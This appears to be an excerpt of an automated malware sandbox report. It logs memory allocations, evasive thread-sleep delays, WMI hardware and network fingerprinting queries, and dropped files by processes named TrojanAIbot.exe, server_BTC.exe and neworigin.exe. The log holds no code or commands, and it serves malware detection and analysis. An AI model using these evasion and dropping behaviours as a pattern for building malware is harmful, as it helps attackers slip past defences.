Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F2C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F2E000 memory commit 500015104
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2E60000 memory commit 500006912
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2E61000 memory commit 500178944
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2E8D000 memory commit 500002816
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2E8E000 memory commit 500350976
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2EE4000 memory commit 501014528
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2FDC000 memory commit 500006912
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2FDE000 memory commit 500015104
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 9E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2660000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: BF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 28B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2AD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 28D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 3180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 5180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: FC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2980000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 4980000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2890000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 26A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: CC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2860000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 26D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 23D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 43D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 1730000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 3050000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 5050000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 4550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 7009
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 2775
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7682
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1876
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 2993
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 6796
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 6545
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 3171
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 3732
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 6074
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\SysWOW64\esentutl.exe Dropped PE file which has not been started: C:\Users\Public\xpha.pif
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99824s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 4072 Thread sleep count: 7009 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99589s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99478s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 4072 Thread sleep count: 2775 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99320s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99166s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98927s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98725s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98483s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98368s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98117s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97989s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97846s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97496s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97382s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97274s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97160s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96912s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96772s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96646s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96522s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96059s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95818s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95693s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95568s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95318s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95055s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94941s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94818s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94696s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94582s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94459s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94334s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94209s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94084s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -93960s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -93844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99725s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99616s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99505s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99382s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99261s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99148s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99039s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98907s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98803s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6468 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676 Thread sleep count: 7682 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 892 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6484 Thread sleep count: 1876 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3032 Thread sleep time: -179580000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3032 Thread sleep time: -407760000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5292 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6664 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99349s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99157s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98999s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98869s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98758s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98377s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98238s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97963s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97713s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97479s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97335s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96552s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96152s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96008s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95868s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95747s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95592s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95416s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95272s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95135s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94898s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94777s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94473s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94153s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99790s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99417s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99183s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98962s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98850s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98723s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98182s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98071s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97964s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97854s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97743s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97524s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97417s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97307s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97197s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97087s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96979s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96869s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96759s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96650s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96540s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96432s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96323s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96213s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96103s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95994s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95881s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95761s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95519s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95386s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4040 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -39660499758475511s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5600 Thread sleep count: 3732 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99886s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99771s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99632s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5600 Thread sleep count: 6074 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99517s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99376s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98832s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98583s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98458s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98208s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97583s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97458s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97208s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96560s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96451s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96189s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95818s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95693s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95568s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95318s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94818s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94693s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94568s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94318s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93660s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93536s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93411s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93286s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4092 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5756 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
